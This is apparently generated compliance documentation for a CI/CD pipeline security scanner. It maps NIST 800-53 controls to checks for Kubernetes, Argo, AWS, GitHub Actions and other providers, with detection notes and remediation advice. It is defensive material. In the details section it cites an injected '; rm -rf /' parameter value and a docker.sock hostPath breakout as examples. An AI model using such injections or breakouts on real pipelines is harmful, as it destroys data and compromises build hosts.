| GCB-023 | Step references a user substitution not declared in substitutions: | MEDIUM | Cloud Build | |
| GHA-002 | pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
| GHA-003 | Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
| GHA-035 | github-script step interpolates untrusted context | HIGH | GitHub Actions | |
| GL-002 | Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
| TKN-003 | Tekton param interpolated unsafely in step script | CRITICAL | Tekton | |
SA-15: Development Process, Standards, and Tools
Evidenced by 5 checks across 3 providers (AWS, CircleCI, GitHub Actions).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CC-002 | Script injection via untrusted environment variable | HIGH | CircleCI | |
| CC-009 | Deploy job missing manual approval gate | MEDIUM | CircleCI | |
| CC-012 | Dynamic config via setup: true enables code injection | MEDIUM | CircleCI | |
| CP-001 | No approval action before deploy stages | HIGH | AWS | |
| GHA-003 | Script injection via untrusted context | HIGH | GitHub Actions | 🔧 fix |
SC-7: Boundary Protection
Evidenced by 22 checks across 6 providers (AWS, Argo Workflows, Cloud Build, Dockerfile, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-004 | Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
| CA-003 | CodeArtifact domain policy allows cross-account wildcard | CRITICAL | AWS | |
| CCM-003 | CodeCommit trigger targets SNS/Lambda in a different account | MEDIUM | AWS | |
| DF-013 | EXPOSE declares sensitive remote-access port | CRITICAL | Dockerfile | 🔧 fix |
| ECR-003 | Repository policy allows public access | CRITICAL | AWS | |
| GCB-021 | No private worker pool, build runs on the shared default pool | MEDIUM | Cloud Build | 🔧 fix |
| K8S-002 | Pod hostNetwork: true | HIGH | Kubernetes | 🔧 fix |
| K8S-003 | Pod hostPID: true | HIGH | Kubernetes | 🔧 fix |
| K8S-004 | Pod hostIPC: true | HIGH | Kubernetes | 🔧 fix |
| K8S-013 | Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
| K8S-014 | Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
| K8S-022 | Service exposes SSH (port 22) | MEDIUM | Kubernetes | |
| K8S-026 | LoadBalancer Service has no loadBalancerSourceRanges | HIGH | Kubernetes | |
| K8S-028 | Container declares hostPort | MEDIUM | Kubernetes | 🔧 fix |
| K8S-030 | Workload schedules onto a control-plane node | HIGH | Kubernetes | 🔧 fix |
| K8S-032 | Namespace lacks default-deny NetworkPolicy | MEDIUM | Kubernetes | |
| K8S-038 | NetworkPolicy ingress / egress allows all sources or destinations | MEDIUM | Kubernetes | |
| LMB-004 | Lambda resource policy allows wildcard principal | CRITICAL | AWS | |
| PBAC-001 | CodeBuild project has no VPC configuration | HIGH | AWS | |
| S3-001 | Artifact bucket public access block not fully enabled | CRITICAL | AWS | |
| SM-002 | Secrets Manager resource policy allows wildcard principal | CRITICAL | AWS | |
| TKN-004 | Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton | |
SC-8: Transmission Confidentiality and Integrity
Evidenced by 9 checks across 8 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Helm, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-008 | Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
| BK-008 | TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
| CC-023 | TLS / certificate verification bypass | HIGH | CircleCI | 🔧 fix |
| GCB-011 | TLS / certificate verification bypass | HIGH | Cloud Build | 🔧 fix |
| HELM-003 | Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
| HELM-009 | Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
| K8S-027 | Ingress has no TLS configuration | MEDIUM | Kubernetes | |
| S3-005 | Artifact bucket missing aws:SecureTransport deny | MEDIUM | AWS | |
| TKN-008 | Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
SC-12: Cryptographic Key Establishment and Management
Evidenced by 9 checks across 1 provider (AWS).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| CA-001 | CodeArtifact domain not encrypted with customer KMS CMK | MEDIUM | AWS | |
| CCM-002 | CodeCommit repository not encrypted with customer KMS CMK | MEDIUM | AWS | |
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| CWL-002 | CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
| ECR-005 | Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
| KMS-001 | KMS customer-managed key has rotation disabled | MEDIUM | AWS | |
| S3-002 | Artifact bucket server-side encryption not configured | HIGH | AWS | |
| SM-001 | Secrets Manager secret has no rotation configured | HIGH | AWS | |
| SSM-002 | SSM SecureString uses the default AWS-managed key | MEDIUM | AWS | |
SC-13: Cryptographic Protection
Evidenced by 9 checks across 4 providers (AWS, Buildkite, Helm, Kubernetes).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| BK-008 | TLS verification disabled in step command | MEDIUM | Buildkite | 🔧 fix |
| CA-001 | CodeArtifact domain not encrypted with customer KMS CMK | MEDIUM | AWS | |
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| ECR-005 | Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
| HELM-003 | Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
| K8S-027 | Ingress has no TLS configuration | MEDIUM | Kubernetes | |
| KMS-001 | KMS customer-managed key has rotation disabled | MEDIUM | AWS | |
| S3-002 | Artifact bucket server-side encryption not configured | HIGH | AWS | |
| SSM-002 | SSM SecureString uses the default AWS-managed key | MEDIUM | AWS | |
SC-28: Protection of Information at Rest
Evidenced by 12 checks across 6 providers (AWS, Argo Workflows, Buildkite, Dockerfile, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-006 | Literal secret value in Argo template env or parameter default | CRITICAL | Argo Workflows | 🔧 fix |
| BK-002 | Literal secret value in pipeline env block | CRITICAL | Buildkite | 🔧 fix |
| CCM-002 | CodeCommit repository not encrypted with customer KMS CMK | MEDIUM | AWS | |
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| CWL-002 | CodeBuild log group not KMS-encrypted | MEDIUM | AWS | |
| DF-019 | COPY/ADD source path looks like a credential file | HIGH | Dockerfile | 🔧 fix |
| ECR-005 | Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
| K8S-008 | Container readOnlyRootFilesystem not true | MEDIUM | Kubernetes | 🔧 fix |
| K8S-018 | Secret stringData/data carries a credential-shaped literal | CRITICAL | Kubernetes | |
| K8S-037 | ConfigMap data carries a credential-shaped literal | HIGH | Kubernetes | |
| S3-002 | Artifact bucket server-side encryption not configured | HIGH | AWS | |
| TKN-005 | Literal secret value in Tekton step env or param default | CRITICAL | Tekton | 🔧 fix |
SI-2: Flaw Remediation
Evidenced by 33 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-001 | Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
| ARGO-001 | Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
| ARGO-007 | Argo workflow has no activeDeadlineSeconds | LOW | Argo Workflows | |
| ARGO-012 | No vulnerability scanning step | MEDIUM | Argo Workflows | |
| BB-001 | pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
| BB-029 | image: (step or service) not pinned by sha256 digest | HIGH | Bitbucket | |
| BK-001 | Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
| BK-006 | Step has no timeout_in_minutes | LOW | Buildkite | |
| BK-012 | No vulnerability scanning step | MEDIUM | Buildkite | |
| CB-005 | Outdated managed build image | MEDIUM | AWS | |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-003 | Docker image not pinned by digest | HIGH | CircleCI | |
| CC-020 | No vulnerability scanning step | MEDIUM | CircleCI | |
| CC-022 | Dependency update command bypasses lockfile pins | MEDIUM | CircleCI | 🔧 fix |
| CW-001 | No CloudWatch alarm on CodeBuild FailedBuilds metric | LOW | AWS | |
| DF-001 | FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
| DF-007 | No HEALTHCHECK directive declared | LOW | Dockerfile | 🔧 fix |
| DF-010 | apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
| EB-001 | No EventBridge rule for CodePipeline failure notifications | MEDIUM | AWS | |
| ECR-001 | Image scanning on push not enabled | HIGH | AWS | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-008 | No vulnerability scanning step in Cloud Build pipeline | MEDIUM | Cloud Build | |
| GCB-025 | Build has no tags for audit / discoverability | LOW | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| GL-001 | Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
| HELM-004 | Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
| HELM-008 | Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
| K8S-001 | Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
| K8S-024 | Container missing both livenessProbe and readinessProbe | MEDIUM | Kubernetes | |
| K8S-033 | Namespace lacks ResourceQuota or LimitRange | MEDIUM | Kubernetes | |
| TKN-001 | Tekton step image not pinned to a digest | HIGH | Tekton | |
| TKN-006 | Tekton run lacks an explicit timeout | LOW | Tekton | |
| TKN-012 | No vulnerability scanning step | MEDIUM | Tekton | |
SI-7: Software, Firmware, and Information Integrity
Evidenced by 33 checks across 13 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-002 | Script injection via attacker-controllable context | HIGH | Azure DevOps | |
| ARGO-004 | Argo workflow mounts hostPath or shares host namespaces | CRITICAL | Argo Workflows | |
| ARGO-008 | Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
| ARGO-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Argo Workflows | |
| ARGO-011 | No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
| BB-002 | Script injection via attacker-controllable context | HIGH | Bitbucket | |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| BK-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
| BK-011 | No SLSA provenance attestation produced | MEDIUM | Buildkite | |
| CC-006 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | CircleCI | |
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| CT-002 | CloudTrail log-file validation disabled | MEDIUM | AWS | |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| GCB-009 | Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
| GCB-017 | Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
| GHA-002 | pull_request_target checks out PR head | CRITICAL | GitHub Actions | 🔧 fix |
| GHA-035 | github-script step interpolates untrusted context | HIGH | GitHub Actions | |
| GL-002 | Script injection via untrusted commit/MR context | HIGH | GitLab CI | |
| HELM-002 | Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
| K8S-010 | Container seccompProfile not RuntimeDefault or Localhost | MEDIUM | Kubernetes | |
| K8S-013 | Pod uses a hostPath volume | HIGH | Kubernetes | 🔧 fix |
| K8S-014 | Pod hostPath references a sensitive host directory | CRITICAL | Kubernetes | |
| K8S-036 | ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
| LMB-001 | Lambda function has no code-signing config | HIGH | AWS | |
| S3-003 | Artifact bucket versioning not enabled | MEDIUM | AWS | |
| SIGN-001 | No AWS Signer profile defined for Lambda deploys | MEDIUM | AWS | |
| SIGN-002 | AWS Signer profile is revoked or inactive | HIGH | AWS | |
| TKN-004 | Tekton Task mounts hostPath or shares host namespaces | CRITICAL | Tekton | |
| TKN-008 | Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
| TKN-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Tekton | |
| TKN-011 | No SLSA provenance attestation produced | MEDIUM | Tekton | |
SR-3: Supply Chain Controls and Processes
Evidenced by 39 checks across 14 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-001 | Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
| ADO-005 | Container image not pinned to specific version | HIGH | Azure DevOps | |
| ARGO-001 | Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
| ARGO-008 | Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
| BB-001 | pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
| BB-029 | image: (step or service) not pinned by sha256 digest | HIGH | Bitbucket | |
| BK-001 | Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| CA-002 | CodeArtifact repository has a public external connection | HIGH | AWS | |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-003 | Docker image not pinned by digest | HIGH | CircleCI | |
| CC-016 | Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
| CC-018 | Package install from insecure source | HIGH | CircleCI | 🔧 fix |
| CC-021 | Package install without lockfile enforcement | MEDIUM | CircleCI | 🔧 fix |
| CC-022 | Dependency update command bypasses lockfile pins | MEDIUM | CircleCI | 🔧 fix |
| DF-001 | FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| DF-010 | apt-get dist-upgrade / upgrade pulls unknown package versions | LOW | Dockerfile | |
| ECR-003 | Repository policy allows public access | CRITICAL | AWS | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-010 | Remote script piped to shell interpreter | HIGH | Cloud Build | |
| GCB-013 | Package install bypasses registry integrity (git / path / tarball) | MEDIUM | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| GL-001 | Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| HELM-001 | Chart.yaml declares legacy apiVersion: v1 | MEDIUM | Helm | 🔧 fix |
| HELM-002 | Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
| HELM-003 | Chart dependency declared on a non-HTTPS repository | HIGH | Helm | 🔧 fix |
| HELM-004 | Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
| HELM-005 | Chart maintainers field empty or missing chain-of-custody info | LOW | Helm | |
| HELM-007 | Chart.yaml description field is empty or missing | LOW | Helm | |
| HELM-008 | Chart.lock generated more than 90 days ago | MEDIUM | Helm | |
| HELM-009 | Chart home / sources URL uses a non-HTTPS scheme | LOW | Helm | |
| JF-001 | Shared library not pinned to a tag or commit | HIGH | Jenkins | |
| K8S-001 | Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
| K8S-036 | ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
| TKN-001 | Tekton step image not pinned to a digest | HIGH | Tekton | |
| TKN-008 | Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
SR-4: Provenance
Evidenced by 24 checks across 8 providers (AWS, Argo Workflows, Buildkite, CircleCI, Cloud Build, Dockerfile, Helm, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ARGO-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Argo Workflows | |
| ARGO-010 | No SBOM generated for build artifacts | MEDIUM | Argo Workflows | |
| ARGO-011 | No SLSA provenance attestation produced | MEDIUM | Argo Workflows | |
| BK-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Buildkite | |
| BK-010 | No SBOM generated for build artifacts | MEDIUM | Buildkite | |
| BK-011 | No SLSA provenance attestation produced | MEDIUM | Buildkite | |
| CC-006 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | CircleCI | |
| CC-007 | SBOM not produced (no CycloneDX/syft/Trivy-SBOM step) | MEDIUM | CircleCI | |
| CP-002 | Artifact store not encrypted with customer-managed KMS key | MEDIUM | AWS | |
| DF-016 | Image lacks OCI provenance labels | LOW | Dockerfile | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| ECR-005 | Repository encrypted with AES256 rather than KMS CMK | MEDIUM | AWS | |
| GCB-007 | availableSecrets references versions/latest | MEDIUM | Cloud Build | 🔧 fix |
| GCB-009 | Artifacts not signed (no cosign / sigstore step) | MEDIUM | Cloud Build | |
| GCB-015 | SBOM not produced (no CycloneDX / syft / Trivy-SBOM step) | MEDIUM | Cloud Build | |
| GCB-017 | Image-producing build does not request SLSA provenance | MEDIUM | Cloud Build | |
| GCB-024 | Build pushes Docker images but top-level images: is empty | LOW | Cloud Build | |
| HELM-005 | Chart maintainers field empty or missing chain-of-custody info | LOW | Helm | |
| LMB-001 | Lambda function has no code-signing config | HIGH | AWS | |
| SIGN-001 | No AWS Signer profile defined for Lambda deploys | MEDIUM | AWS | |
| SIGN-002 | AWS Signer profile is revoked or inactive | HIGH | AWS | |
| TKN-009 | Artifacts not signed (no cosign/sigstore step) | MEDIUM | Tekton | |
| TKN-010 | No SBOM generated for build artifacts | MEDIUM | Tekton | |
| TKN-011 | No SLSA provenance attestation produced | MEDIUM | Tekton | |
SR-11: Component Authenticity
Evidenced by 31 checks across 14 providers (AWS, Argo Workflows, Azure DevOps, Bitbucket, Buildkite, CircleCI, Cloud Build, Dockerfile, GitHub Actions, GitLab CI, Helm, Jenkins, Kubernetes, Tekton).
| Check | Title | Severity | Provider | Fix |
|---|---|---|---|---|
| ADO-001 | Task reference not pinned to specific version | HIGH | Azure DevOps | 🔧 fix |
| ADO-005 | Container image not pinned to specific version | HIGH | Azure DevOps | |
| ARGO-001 | Argo template container image not pinned to a digest | HIGH | Argo Workflows | |
| ARGO-008 | Argo script source pipes remote install or disables TLS | HIGH | Argo Workflows | 🔧 fix |
| BB-001 | pipe: action not pinned to exact version | HIGH | Bitbucket | 🔧 fix |
| BB-029 | image: (step or service) not pinned by sha256 digest | HIGH | Bitbucket | |
| BK-001 | Buildkite plugin not pinned to an exact version | HIGH | Buildkite | |
| BK-004 | Remote script piped into shell interpreter | HIGH | Buildkite | 🔧 fix |
| CA-002 | CodeArtifact repository has a public external connection | HIGH | AWS | |
| CC-001 | Orb not pinned to exact semver | HIGH | CircleCI | 🔧 fix |
| CC-003 | Docker image not pinned by digest | HIGH | CircleCI | |
| CC-016 | Remote script piped to shell interpreter | HIGH | CircleCI | 🔧 fix |
| CC-018 | Package install from insecure source | HIGH | CircleCI | 🔧 fix |
| CC-021 | Package install without lockfile enforcement | MEDIUM | CircleCI | 🔧 fix |
| DF-001 | FROM image not pinned to sha256 digest | HIGH | Dockerfile | 🔧 fix |
| DF-003 | ADD pulls remote URL without integrity verification | HIGH | Dockerfile | |
| DF-004 | RUN executes a remote script via curl-pipe / wget-pipe | HIGH | Dockerfile | |
| ECR-002 | Image tags are mutable | HIGH | AWS | |
| GCB-001 | Cloud Build step image not pinned by digest | HIGH | Cloud Build | 🔧 fix |
| GCB-010 | Remote script piped to shell interpreter | HIGH | Cloud Build | |
| GCB-013 | Package install bypasses registry integrity (git / path / tarball) | MEDIUM | Cloud Build | |
| GHA-001 | Action not pinned to commit SHA | HIGH | GitHub Actions | 🔧 fix |
| GL-001 | Image not pinned to specific version or digest | HIGH | GitLab CI | 🔧 fix |
| GL-005 | include: pulls remote / project without pinned ref | HIGH | GitLab CI | |
| HELM-002 | Chart.lock missing per-dependency digests | HIGH | Helm | 🔧 fix |
| HELM-004 | Chart dependency version is a range, not an exact pin | MEDIUM | Helm | |
| JF-001 | Shared library not pinned to a tag or commit | HIGH | Jenkins | |
| K8S-001 | Container image not pinned by sha256 digest | HIGH | Kubernetes | 🔧 fix |
| K8S-036 | ServiceAccount imagePullSecrets references missing Secret | MEDIUM | Kubernetes | |
| TKN-001 | Tekton step image not pinned to a digest | HIGH | Tekton | |
| TKN-008 | Tekton step script pipes remote install or disables TLS | HIGH | Tekton | 🔧 fix |
Check details
Every check that evidences this standard, rendered once with its detection mechanism, recommendation, and any known false-positive modes or real-world incident references. The per-control tables above link to the matching block here.
ADO-001: Task reference not pinned to specific version HIGH 🔧 fix
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Floating-major task references (@1, @2) can roll forward silently when the task publisher ships a breaking or malicious update. The check passes when every task: reference carries a two- or three-segment semver.
Recommendation. Reference tasks by a full semver (DownloadSecureFile@1.2.3) or extension-published-version. Track task updates explicitly via Azure DevOps extension settings rather than letting @1 drift.
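A minimal before/after sketch of the pinned form, following the recommendation's own DownloadSecureFile example; the input value is illustrative:

```yaml
steps:
  # Floating major: rolls forward silently whenever the publisher ships an update.
  # - task: DownloadSecureFile@1

  # Pinned: the reference names an exact published version.
  - task: DownloadSecureFile@1.2.3
    inputs:
      secureFile: deploy-key.pem   # illustrative secure-file name
```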
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: ADO-001 in the Azure DevOps provider.
ADO-002: Script injection via attacker-controllable context HIGH
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation, SI-7 Software, Firmware, and Information Integrity.
How this is detected. $(Build.SourceBranch*), $(Build.SourceVersionMessage), and $(System.PullRequest.*) are populated from SCM event metadata the attacker controls. Inline interpolation into a script body executes crafted content.
Recommendation. Pass these values through an intermediate pipeline variable declared with readonly: true, and reference that variable through an environment variable rather than $(...) macro interpolation. ADO expands $(…) before shell quoting, so inline use is never safe.
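A sketch of that indirection pattern, with illustrative variable and step names:

```yaml
variables:
  # Capture the attacker-controllable context once, in a readonly variable.
  - name: sourceBranch
    value: $(Build.SourceBranch)
    readonly: true

steps:
  - script: |
      # The value arrives as an environment variable; no $(...) macro is
      # expanded inside the script body, so the shell never re-parses it.
      echo "Building $SOURCE_BRANCH"
    env:
      SOURCE_BRANCH: $(sourceBranch)
```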
Source: ADO-002 in the Azure DevOps provider.
ADO-003: Variables contain literal secret values CRITICAL
Evidences: IA-5 Authenticator Management.
How this is detected. Scans variables: in both the mapping form ({KEY: VAL}) and the list form ([{name: X, value: Y}]) that ADO supports. AWS keys are detected by value shape regardless of variable name.
Recommendation. Store secrets in an Azure Key Vault or a Library variable group with the secret flag set; reference them via $(SECRET_NAME) at runtime. For cloud access prefer Azure workload identity federation.
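A sketch of the variable-group pattern, assuming a Library group named prod-secrets whose values carry the secret flag:

```yaml
variables:
  # Secrets live in the Library (or a linked Key Vault), not in the YAML.
  - group: prod-secrets

steps:
  - script: ./deploy.sh
    env:
      # Secret variables are not exported automatically; map each one explicitly.
      API_TOKEN: $(API_TOKEN)
```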
Source: ADO-003 in the Azure DevOps provider.
ADO-004: Deployment job missing environment binding MEDIUM
Evidences: AC-3 Access Enforcement, SA-10 Developer Configuration Management.
How this is detected. Without an environment: binding, ADO cannot enforce approvals, checks, or deployment history against a named resource. Every deployment: job should bind one.
Recommendation. Add environment: <name> to every deployment: job. Configure approvals, required branches, and business-hours checks on the matching Environment in the ADO UI.
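A minimal deployment job with the binding in place; the environment name is illustrative:

```yaml
jobs:
  - deployment: deploy_prod
    # Approvals, checks, and deployment history attach to this named resource.
    environment: production
    strategy:
      runOnce:
        deploy:
          steps:
            - script: ./deploy.sh
```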
Source: ADO-004 in the Azure DevOps provider.
ADO-005: Container image not pinned to specific version HIGH
Evidences: CM-2 Baseline Configuration, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Container images can be declared at resources.containers[].image or job.container (string or {image:}). Floating / untagged refs let the publisher swap the image contents.
Recommendation. Reference images by @sha256:<digest> or at minimum a full immutable version tag. Avoid :latest and untagged refs.
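A sketch of a digest-pinned container resource; the digest placeholder stands in for a real 64-hex value:

```yaml
resources:
  containers:
    - container: build
      # Content-addressed: the publisher cannot re-point this reference.
      image: ubuntu@sha256:<64-hex-digest>

jobs:
  - job: compile
    container: build
    steps:
      - script: make
```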
Source: ADO-005 in the Azure DevOps provider.
ARGO-001: Argo template container image not pinned to a digest HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Walks spec.templates[].container, spec.templates[].script, and spec.templates[].containerSet.containers[]. The image must contain @sha256: followed by a 64-char hex digest.
Recommendation. Pin every container / script template image to a content-addressable digest (alpine@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the workflow's containers at the next pull, with no audit trail in the WorkflowTemplate.
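A minimal passing template, assuming the digest shown is the one the tag currently resolves to:

```yaml
apiVersion: argoproj.io/v1alpha1
kind: WorkflowTemplate
metadata:
  name: build
spec:
  templates:
    - name: compile
      container:
        # Tag kept for readability; the digest is what actually gets pulled.
        image: alpine:3.18@sha256:<64-hex-digest>
        command: [sh, -c]
        args: ["make build"]
```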
Source: ARGO-001 in the Argo Workflows provider.
ARGO-002: Argo template container runs privileged or as root HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Detection fires on securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all. Also walks spec.podSpecPatch (raw YAML) for an explicit privileged: true token.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every template container / script. A privileged container shares the node's kernel namespaces; a malicious image then has root on the build node and breaks the boundary between workflow and cluster.
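A sketch of the hardened securityContext the recommendation describes:

```yaml
spec:
  templates:
    - name: build
      container:
        image: alpine@sha256:<digest>
        securityContext:
          privileged: false
          runAsNonRoot: true
          allowPrivilegeEscalation: false
```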
Source: ARGO-002 in the Argo Workflows provider.
ARGO-003: Argo workflow uses the default ServiceAccount MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. Applies to Workflow and CronWorkflow. WorkflowTemplate / ClusterWorkflowTemplate are exempt because the SA is set on the run that references them. An explicit serviceAccountName: default is treated the same as omission.
Recommendation. Set spec.serviceAccountName (or spec.workflowSpec.serviceAccountName for CronWorkflow) to a least-privilege ServiceAccount that carries only the secrets and RBAC the workflow needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for workflow pods.
Source: ARGO-003 in the Argo Workflows provider.
ARGO-004: Argo workflow mounts hostPath or shares host namespaces CRITICAL
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Walks spec.volumes[].hostPath and the raw spec.podSpecPatch string for hostNetwork, hostPID, hostIPC, and hostPath.
Recommendation. Use emptyDir or PVC-backed volumes instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true from any inline podSpecPatch. A hostPath mount of /var/run/docker.sock or / lets the workflow break out of the pod and act as the underlying node.
Source: ARGO-004 in the Argo Workflows provider.
ARGO-005: Argo input parameter interpolated unsafely in script / args CRITICAL
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Fires on any {{inputs.parameters.X}}, {{workflow.parameters.X}}, or {{item.X}} token inside a script.source body or a container.args string that isn't already wrapped in quotes. Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate {{inputs.parameters.<name>}} directly into script.source or container.args. Argo substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Pass the parameter via env: (value: '{{inputs.parameters.<name>}}') and reference the env var quoted in the script ("$NAME"); or use inputs.artifacts for file payloads.
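A minimal sketch of the env-var indirection the rule treats as safe (template and parameter names hypothetical):

```yaml
templates:
  - name: greet
    inputs:
      parameters:
        - name: msg
    script:
      image: alpine:3.18
      command: [sh]
      env:
        - name: MSG
          value: "{{inputs.parameters.msg}}"   # substitution lands in the env value
      source: |
        echo "$MSG"   # quoted env reference; the shell never parses the raw parameter
```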
Source: ARGO-005 in the Argo Workflows provider.
ARGO-006: Literal secret value in Argo template env or parameter default CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than an interpolation.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or arguments.parameters[].value. Workflow manifests are committed to git and cluster-readable; literal values leak through normal access paths.
